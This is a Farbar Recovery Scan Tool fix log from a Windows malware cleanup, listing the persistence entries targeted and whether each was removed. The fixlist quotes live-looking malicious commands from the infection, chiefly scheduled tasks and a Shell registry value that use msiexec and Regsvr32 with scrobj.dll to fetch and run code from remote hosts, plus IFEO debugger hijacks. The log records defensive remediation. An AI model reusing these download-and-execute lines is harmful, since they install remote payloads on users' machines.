Fix result of Farbar Recovery Scan Tool (x64) Version: 27-04-2017 Ran by Arekcipa (30-04-2017 14:33:04) Run:1 Running from C:\Users\Arekcipa\Downloads Loaded Profiles: Arekcipa (Available Profiles: Arekcipa) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== ATTENTION RemoveDirectory: C:\Program Files (x86)\Doeye Task: {7BE3337D-631A-4D0C-8C69-A5F7CDA67D79} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q Task: {A40E3F91-5995-4A8A-8699-53EFAA9D14A6} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== scrobj.dll Task: {E40686E5-FC3F-44C2-9348-C26991415F62} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== scrobj.dll C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{D6635014-F9FD-489A-A18A-D2C4BCD33616}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe FirewallRules: [{8F2CADE9-7620-4E1E-978E-84231DE2E209}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{70086F64-9FA6-483E-BD52-F45BDBB50643}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Arekcipa\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Arekcipa\AppData\Local\Firefox HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== /q HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== ATTENTION R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108720 2017-04-26] () <==== ATTENTION S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Arekcipa\AppData\Local\Mozilla C:\Users\Arekcipa\AppData\Roaming\Mozilla C:\Users\Arekcipa\AppData\Roaming\Profiles EmptyTemp: ***************** Processes closed successfully. Restore point was successfully created. HKU\S-1-5-21-252974029-621322211-1437129156-1001_Classes\ChromeHTML => key removed successfully "C:\Program Files (x86)\Doeye" => removed successfully. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BE3337D-631A-4D0C-8C69-A5F7CDA67D79} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BE3337D-631A-4D0C-8C69-A5F7CDA67D79} => key removed successfully C:\Windows\System32\Tasks\T0528 => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\T0528 => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A40E3F91-5995-4A8A-8699-53EFAA9D14A6} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A40E3F91-5995-4A8A-8699-53EFAA9D14A6} => key removed successfully C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E40686E5-FC3F-44C2-9348-C26991415F62} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E40686E5-FC3F-44C2-9348-C26991415F62} => key removed successfully C:\Windows\System32\Tasks\PowerWord-SCT-JT => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => key removed successfully C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => moved successfully "C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk" => not found. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => moved successfully C:\Users\Public\Desktop\Google Chrome.lnk => moved successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D6635014-F9FD-489A-A18A-D2C4BCD33616} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{8F2CADE9-7620-4E1E-978E-84231DE2E209} => value removed successfully HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{70086F64-9FA6-483E-BD52-F45BDBB50643} => value removed successfully "C:\Program Files (x86)\Firefox" => removed successfully. "C:\Users\Arekcipa\AppData\Roaming\Firefox" => removed successfully. "C:\Users\Arekcipa\AppData\Local\Firefox" => removed successfully. HKU\S-1-5-21-252974029-621322211-1437129156-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value removed successfully HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE => value removed successfully HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => key removed successfully HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => key removed successfully HKU\S-1-5-21-252974029-621322211-1437129156-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => key removed successfully HKLM\System\CurrentControlSet\Services\FirefoxU => key removed successfully FirefoxU => service removed successfully HKLM\System\CurrentControlSet\Services\wfpcapture => key removed successfully wfpcapture => service removed successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => moved successfully "C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk" => not found. C:\Users\Public\Desktop\Mozilla Firefox.lnk => moved successfully HKCU\Software\Mozilla => key not found. HKCU\Software\MozillaPlugins => key not found. HKLM\SOFTWARE\Mozilla => key not found. HKLM\SOFTWARE\MozillaPlugins => key not found. HKLM\SOFTWARE\Wow6432Node\Mozilla => key removed successfully HKLM\SOFTWARE\Wow6432Node\mozilla.org => key not found. HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => key removed successfully "C:\Users\Arekcipa\AppData\Local\Mozilla" => not found. C:\Users\Arekcipa\AppData\Roaming\Mozilla => moved successfully "C:\Users\Arekcipa\AppData\Roaming\Profiles" => not found. =========== EmptyTemp: ========== BITS transfer queue => 820412 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 13846607 B Java, Flash, Steam htmlcache => 233739164 B Windows/system/drivers => 5732072 B Edge => 0 B Chrome => 791056854 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 1516 B systemprofile32 => 128 B LocalService => 0 B NetworkService => 501204 B Arekcipa => 694450776 B RecycleBin => 0 B EmptyTemp: => 1.6 GB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 14:34:06 ====